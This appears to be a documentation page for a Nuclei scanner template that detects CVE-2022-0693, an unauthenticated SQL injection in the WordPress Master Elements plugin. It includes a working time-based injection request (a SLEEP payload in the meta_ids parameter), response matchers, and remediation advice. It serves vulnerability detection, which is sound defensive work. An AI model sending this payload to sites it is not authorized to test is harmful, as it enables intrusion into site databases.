WordPress Master Elements <=8.0 - SQL Injection
ID: CVE-2022-0693
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch
Description
Section titled “Description”WordPress Master Elements plugin through 8.0 contains a SQL injection vulnerability. The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2022-0693
info: name: WordPress Master Elements <=8.0 - SQL Injection author: theamanrawat severity: critical description: | WordPress Master Elements plugin through 8.0 contains a SQL injection vulnerability. The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update to the latest version of WordPress Master Elements plugin (>=8.1) to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/a72bf075-fd4b-4aa5-b4a4-5f62a0620643 - https://wordpress.org/plugins/master-elements - https://nvd.nist.gov/vuln/detail/CVE-2022-0693 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0693 cwe-id: CWE-89 epss-score: 0.02367 epss-percentile: 0.89814 cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: devbunch product: master_elements framework: wordpress tags: time-based-sqli,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch
http: - raw: - | @timeout: 10s GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(body, "Post Meta Setting Deleted Successfully")' condition: and# digest: 4b0a004830460221008ce82d1a069a6412b1edded7ef53c1a8986dc6963bb94b8e6f10acd242a8f651022100dd4022dae1e6d305977718395f1f8e6b29a5d64a925bc56b39f464216c504225:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0693.yaml"